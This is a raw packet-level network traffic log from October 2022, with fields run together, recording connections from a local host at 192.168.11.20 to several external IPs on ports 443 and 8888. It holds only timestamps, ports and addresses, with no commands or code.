                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.044864893 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.045931101 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.046075106 CEST4434983813.32.99.56192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.095916033 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.163003922 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.163027048 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.163033009 CEST4434983813.32.99.56192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.475615025 CEST4434983813.32.99.56192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.475677013 CEST4434983813.32.99.56192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.475835085 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.477866888 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.477875948 CEST4434983813.32.99.56192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.477917910 CEST49838443192.168.11.2013.32.99.56
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.477925062 CEST4434983813.32.99.56192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.925771952 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.925846100 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.926093102 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.926434040 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.926490068 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.980237961 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.980515003 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.981585979 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.981601000 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.981954098 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.983812094 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.993371964 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.993455887 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.993581057 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.993629932 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.993650913 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.993654966 CEST49839443192.168.11.2023.79.157.152
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:16.993664980 CEST4434983923.79.157.152192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.468472958 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.468532085 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.468694925 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.469187975 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.469227076 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.528683901 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.528836012 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.528883934 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.533848047 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.533863068 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.534117937 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.534229040 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.534914970 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:17.578514099 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.019933939 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.019983053 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.020194054 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.024425983 CEST49841443192.168.11.20188.114.96.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.024434090 CEST44349841188.114.96.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.166608095 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.166690111 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.166889906 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.167603016 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.167644978 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.213788986 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.213988066 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.218674898 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.218698978 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.219083071 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.219240904 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.219785929 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.262500048 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951574087 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951668978 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951702118 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951726913 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951821089 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951836109 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951848984 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951919079 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.951935053 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952027082 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952037096 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952075958 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952085972 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952100039 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952176094 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952178955 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952251911 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952260017 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952271938 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952320099 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952333927 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952423096 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952440023 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952445984 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952455997 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952470064 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952574968 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952590942 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952624083 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952698946 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952699900 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952713966 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952755928 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952826977 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952842951 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952881098 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952927113 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.952939034 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953026056 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953042030 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953046083 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953057051 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953073978 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953087091 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953124046 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953138113 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953141928 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953154087 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953250885 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953258991 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953299046 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953315020 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953320026 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953330994 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953397036 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953412056 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953417063 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953425884 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953428984 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953495026 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953505039 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953609943 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953615904 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953659058 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953707933 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953712940 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.953716040 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.961690903 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.961886883 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.961918116 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.961932898 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.961975098 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962004900 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962080956 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962096930 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962102890 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962143898 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962193966 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962243080 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962246895 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962447882 CEST49842443192.168.11.20188.114.97.3
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:18.962464094 CEST44349842188.114.97.3192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.751343966 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.772234917 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.772527933 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.772708893 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.793385983 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799442053 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799649000 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799659967 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799767971 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799777031 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799787045 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799846888 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799913883 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799931049 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799947023 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799962044 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799964905 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.799972057 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800071001 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800080061 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800127983 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800173998 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800183058 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800246954 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800297022 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.800412893 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.820771933 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.820866108 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.820874929 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821177006 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821240902 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821250916 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821472883 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821480989 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821484089 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821578026 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821589947 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821742058 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821751118 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821760893 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821770906 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821778059 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821861982 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821865082 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821866035 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821877956 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821885109 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.821964025 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.822016954 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.822021008 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.822022915 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.822113991 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842482090 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842546940 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842555046 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842665911 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842720032 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842726946 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842788935 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842894077 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842916012 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.842922926 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.843064070 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.843247890 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846153021 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846262932 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846271038 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846383095 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846437931 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846445084 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846498966 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846504927 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846635103 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846683979 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846685886 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846693039 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846791029 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846884012 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846890926 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846908092 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846915007 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.846941948 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847042084 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847059011 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847064972 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847101927 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847157955 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847330093 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847666979 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847789049 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.847795963 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848179102 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848208904 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848217964 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848316908 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848325014 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848578930 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848583937 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.848922014 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.849524975 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864340067 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864454031 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864461899 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864471912 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864485025 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864495039 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864562988 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864581108 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864590883 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864670992 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864690065 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864778042 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864798069 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864808083 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.864957094 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.865005970 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.865271091 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.865793943 CEST498438888192.168.11.20103.136.42.153
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.867923975 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.868031979 CEST888849843103.136.42.153192.168.11.20
                                                                                                                                                                                                                                    Oct 4, 2022 07:10:19.868120909 CEST498438888192.168.11.20103.136.42.153
